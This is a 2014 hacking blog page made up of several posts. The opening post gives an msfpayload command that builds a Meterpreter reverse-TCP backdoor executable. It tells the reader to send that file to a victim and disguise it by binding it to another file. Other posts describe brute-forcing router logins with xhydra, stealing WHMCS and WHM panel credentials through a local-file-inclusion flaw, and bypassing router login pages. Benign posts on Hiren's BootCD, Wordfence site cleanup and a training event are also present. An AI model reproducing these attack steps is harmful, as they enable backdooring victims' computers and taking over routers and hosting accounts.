WELCOME TO "Pak SOftwares Spot" !

Learn Hacking , FB Hacking , New Hacking Tricks , And Full Web Hacking Only With Pak Softwares Spot


Monday, 14 April 2014

0 How To Backdoor Windows Using Metasploit

1. Open a terminal and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=(YOUR IP) LPORT=(CHOOSE A PORT) x > /root/Desktop/CHOOSE_A_FILE_NAME.exe
Now that our exploit is done:
2. Go to Metasploit console by typing msfconsole and type:
3. Now send the file to victim and as soon as they download and open it, there’s meterpreter shell on victim computer.
Thats it!
**It is important to hide the exploit behind other file.
Click here to see how to bind a file.

Monday, 7 April 2014

0 Hiren's BootCD Full Download

Hiren's Boot CD is a boot CD containing various diagnostic programs such as partitioning agents, system performance benchmarks, disk cloning and imaging tools, data recovery tools, MBR tools, BIOS tools, and many others for fixing various computer problems. It is a Bootable CD; thus, it can be useful even if the primary operating system cannot be booted. Hiren's Boot CD has an extensive list of software. Utilities with similar functionality on the CD are grouped together and seem redundant; however, they present choices through UI differences.
All in one Bootable CD which has all these utilities :
* Antivirus Tools
* Backup Tools
* BIOS / CMOS Tools
* Browsers / File Managers
* Cleaners
* FileSystems Tools
* Hard Disk Tools
* MBR (Master Boot Record) Tools
* MultiMedia Tools
* Ms Dos Tools
Network Tools
* Optimizers
* Partition Tools
* Password Tools
* Process Tools
* RAM (Memory) Testing Tools
* Recovery Tools
Registry Tools
* Remote Control Tools
* Security Tools
Startup Tools
* System Information Tools
* Testing Tools
* Tweakers
* Other Tools

Download Links:

0 Hack WIFI Router Password 100% Solution

Hacking Router Login Password using Xhydra

We are going to hack a ADSL router password using Xhydra in Backtrack 4. Here my router is Beetel 450tc1 wifi ADSL2+ router.

Boot Backtrack,
1. start Run command, type xhydra and press enter.

2. xhydra GUI opens, In the target tab, select
    Single Target :
    Protocol: http-get

3. In passwords tab, select
    username: admin (because most of the routers have default username as admin)
    In the passwords, select the password list option and browse to select your passwords file. In backtrack       default passwords file is under the directory"/pentest/passwords/sshatter/" in the file name passwords. Here i have used my custom password file.

4. Leave the default values in the Tuning tab, move to specific tab and select
  http/https url :

5. Now go to the start tab and click on start button, the password cracking begins and result is as follows.
Thus, the router password is hacked and we got access to the router management 

0 How to Access Router Without knowing Username & Password

In some cases we want to change settings of our router but suddenly we realized that we don’t know the username and password of router.SO here is the solution for it


1) Open cmd and type in "ipconfig"

2) Goto you browser and type in the Default Gateway in the address bar. e.g

3) Now you have to go to your modem (physically) and on bottom 
of the modem their will be Modem Access Lode

4) In Username type in "admin" or "user" and in password type that MODEM ACCESS CODE.

5) If there is not the Modem Access Lode Code than you can try typing in the default USERNAME and PASSWORD.The default username is "admin" and default password is also "admin"

7) If default username and password also didnt work then we have another solution! You can bypass the USERNAME and PASSWORD page!!! What you want to do is just type you'r default gateway in you'r browsers address bar and type in "/main.html" and here you are! Congrats..You are in you'r router's setting!
    e.g ""

8) ENJOY....

Friday, 4 April 2014

0 How To Hack WHM Panel

Hey Friends I m going to tell you how to Crack Whm Panel  LFI  Exploit :-
Things you need :-
Shell in a server :- 
Hosting ( Powered by WHMCS )
LFI Exploit :-

Now how to crack it ? If you have all the above things :-
Find cart.php in the site like www.host.com/cart.php
IF you get the cart.php now put your LFI Exploit :- AS SHOWN BELOW

After putting your LFI Exploit  Perss ctrl + U or rightclick - View Page Source.
There you get the Username n Password of the hosting :- IMAGE BELOW

After getting the Username n Password . Click the SQL Option From your shell. Type the Username n Password there then select the database :-

Now select the Table admin's  you get the password of WHMCS. Decrypt the password. Login to the WHM Panel Enjoy.. ;)

i hope this post is helpful to u.. ;)

Tuesday, 1 April 2014

0 Recover Wordpress Site Easily


If your site has been hacked, Don’t Panic.
You can use Wordfence to clean much of the malicious code from your site. Wordfence lets you compare your hacked files against the original WordPress core files, and the original copies of WordPress themes and plugins in the repository. Wordfence lets you see what has changed (do a diff) and gives you the option to repair files with one click and take other actions.

How to clean your hacked WordPress site with Wordfence:

  1. Upgrade your site to the newest version of WordPress.
  2. Upgrade all your themes and plugins to their newest versions.
  3. Change all passwords on the site.
  4. Backup all your files and the database.
  5. Go to the Wordfence options page and make sure the options to scan core, theme and plugin files are selected. Then run a Wordfence scan. This compares your core, theme and plugin files against the original versions in the WordPress repository and lets you know how a hacker has changed them.
  6. When the results come up you may see a very long list of infected files. Take your time and slowly work through the list.
  7. Examine any suspicious files and delete them if they are dangerous. Remember that you can’t undo deletions.
  8. Look at any changed core, theme and plugin files. Use the option Wordfence provides to see what has changed between the original file and your file. If the changes look malicious, use the Wordfence option to repair the file.
  9. Look at any unknown files that are in core directories and delete them if necessary.
  10. Slowly work your way through the list until it is empty.
  11. Run another scan and confirm your site is clean.
  12. If you are still getting an alert from another product or from Google that says your site has a problem, please contact us via our support forum and we’ll take a look.

I have a file that looks suspicious, but I’m not sure if it is. How can I tell?

Email it to us at samples@wordfence.com and we’ll let you know. If you don’t receive a reply, either your mail system or ours may have discarded the message thinking it was malicious because of your attachment. So please email us a message without the attachment letting us now that you’re trying to send us something and we’ll try to help get it through.

I’ve cleaned my hacked WordPress site but Google Chrome is still giving me the malware warning. What should I do?

You need to get your site removed from the Google Safe Browsing list. Read this Google document on how to clean your site. Here are the steps:
  1. First sign-in to Google Webmaster Tools.
  2. Add your site if you haven’t already.
  3. Verify your site. Installing the Google Site Verification Plugin may help with this.
  4. On the Webmaster Tools home page, select your site.
  5. Click Site status, and then click Malware.
  6.  Click Request a review.

My site visitors are getting warnings from other security products and anti-virus systems. What should I do?

Getting off the Google Safe Browsing list is a big step, but you may have some work ahead of you. You need to keep a list of every anti-virus product that is saying your site is infected. This may include products like ESET anti-virus, McAfee’s Site Advisor and others. Visit each anti-virus makers website and find their instructions for removing your site from their list of dangerous sites. This is often called “whitelisting” by anti-virus makers, so Googling for terms like ‘whitelisting’, ‘site removal’, ‘false positive’ and the product name will usually lead you to the place where you can get your site removed.

How can I manually check if my site is listed on Google’s Safe Browsing List?

Visit the following URL and replace example.com with your own site address.
You can include a sub-directory if your site has one. The page that appears is very plain, but contains detailed information about the current status of your site, why it is listed on Google’s malware or phishing list (The google safe browsing list is actually two lists) and what to do next.

Friday, 28 March 2014

0 Mile2 Free Security Tranning + Certification In Karachi , Pakistan


We at Creative Blitz feel proud to announce "Scholarship Event" for the students of Karachi. We would like to Thank Mile2 Pakistan for sponsoring the event and for hiring our services to organize the event.


Event Sponsor : Mile2 & CISS
Event Organizer : Creative Blitz
Event Supporters : 1sBit
Office Support : AMI APEX

Scholarship Includes :
1) Free Training of Certified Security Sentinel and Certified Vulnerability Assessor.

2) 1 x Exam Voucher of student choice (Either C)SS or C)VA), Voucher will be uploaded into student's account.

3) 2 Official Training Certificates and 1 Certificate after passing the exam.

4) Course Guide loaded into student's account.

5) Student who will pass the exam will get further discount in future.
Event Details :

Session Duration : 1 Day (OFFICIAL TRAINING)
Date : 27th April 2014
Time : 8:00 AM - 7:00 PM (1:00 PM - 2:00 PM Break Time)
Venue : Pearl Continental Hotel Karachi
Contact : 0336-2501378 ( Shaharyar ) , 0345-3184509 ( Rafay ) , 0324-3323740 ( Razi )
Website : www.creativeblitzz.com , www.amiapex.com
Office : FL-3/10, Block # 5, Gulshan-e-Iqbal, Near Essa Lab, Karachi.

Registration FEES : 2000/- (Lunch & Multiple refreshments Included)

-Detailed information about both courses can be found on mile2 official website @ www.mile2.com

*C)SS : http://www.mile2.com/general-security-courses/certified-security-sentinel.html
*C)VA : http://www.mile2.com/general-security-courses/certified-vulnerability-assessor.html

*We are available for registration from 12:00PM onwards in our office till 9:00PM at the mentioned address above.

Looking forward to make this event a success. INSHALLAH and to get most students certified.


  • Home
  • About Me
  • Contact us
  • Guest Post
  • Privacy Policy
  • Back To Top